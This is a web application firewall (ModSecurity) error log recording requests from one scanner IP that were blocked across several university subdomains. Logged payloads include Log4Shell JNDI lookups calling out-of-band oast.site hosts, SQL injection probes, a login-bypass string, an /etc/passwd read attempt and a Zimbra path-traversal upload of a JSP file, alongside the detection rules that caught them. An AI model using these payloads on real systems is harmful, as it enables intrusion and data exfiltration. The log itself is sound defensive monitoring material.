[Tue Aug 29 11:34:10.375817 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgxdy4az6ysebfm.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAASQqAcAAAAT"]
[Tue Aug 29 11:34:10.380138 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlg75hawn6wji6jr.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAARQ4GUAAAAB"]
[Tue Aug 29 11:34:10.381615 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgsfoe5ajtmkieq.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAASS7@IAAAAY"]
[Tue Aug 29 11:34:10.397750 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAAST5AkAAAAZ"]
[Tue Aug 29 11:34:11.303514 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAAPDoMwAAAAP"]
[Tue Aug 29 11:34:11.304849 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASfNu4AAAAg"]
[Tue Aug 29 11:34:11.306098 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASMggUAAAAO"]
[Tue Aug 29 11:34:11.313311 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASHh6YAAAAD"]
[Tue Aug 29 11:34:11.339863 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11Q8Co-f0AAASHh6cAAAAD"]
[Tue Aug 29 11:34:11.372790 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11Q8Co-f0AAASfNvEAAAAg"]
[Tue Aug 29 11:34:11.377593 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASI0A8AAAAG"]
[Tue Aug 29 11:34:11.423217 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg495kisaxs56bd.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg495kisaxs56bd.oast.site}: ${jndi:ldap://${:-178}${:-654}.${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgjoga16c4saiyz.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11Q8Co-f0AAASQqA4AAAAT"]
[Tue Aug 29 11:34:11.442528 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgauswhszh9roi8.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgauswhszh9roi8.oast.site}: ${jndi:ldap://${:-178}${:-654}.${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgi6q96h49fceuf.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11Q8Co-f0AAAPLwGMAAAAX"]
[Tue Aug 29 11:34:12.337341 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAAPLwGQAAAAX"]
[Tue Aug 29 11:34:12.397236 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAAQKOtYAAAAs"]
[Tue Aug 29 11:34:12.397826 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAAPLwGUAAAAX"]
[Tue Aug 29 11:34:12.401360 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11RMCo-f0AAASHh60AAAAD"]
[Tue Aug 29 11:34:12.407230 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAAPDoM8AAAAP"]
[Tue Aug 29 11:34:12.422526 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAAQKOtcAAAAs"]
[Tue Aug 29 11:34:12.423072 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgiekrzq3chbykx.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11RMCo-f0AAASMggkAAAAO"]
[Tue Aug 29 11:34:12.432789 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11RMCo-f0AAASNzpsAAAAQ"]
[Tue Aug 29 11:34:13.313162 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAARQ4HEAAAAB"]
[Tue Aug 29 11:34:13.324736 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RcCo-f0AAASNzpwAAAAQ"]
[Tue Aug 29 11:34:13.329550 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAAPLwGgAAAAX"]
[Tue Aug 29 11:34:13.331069 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAAPDoNEAAAAP"]
[Tue Aug 29 11:34:13.341390 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAASS7@UAAAAY"]
[Tue Aug 29 11:34:13.347499 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAASGMtoAAAAA"]
[Tue Aug 29 11:34:13.351914 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAAPDoNIAAAAP"]
[Tue Aug 29 11:34:14.557455 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11RsCo-f0AAAPLwG4AAAAX"]
[Tue Aug 29 11:34:15.320801 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgefgz79tbz9ug6.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgefgz79tbz9ug6.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAAPLwG8AAAAX"]
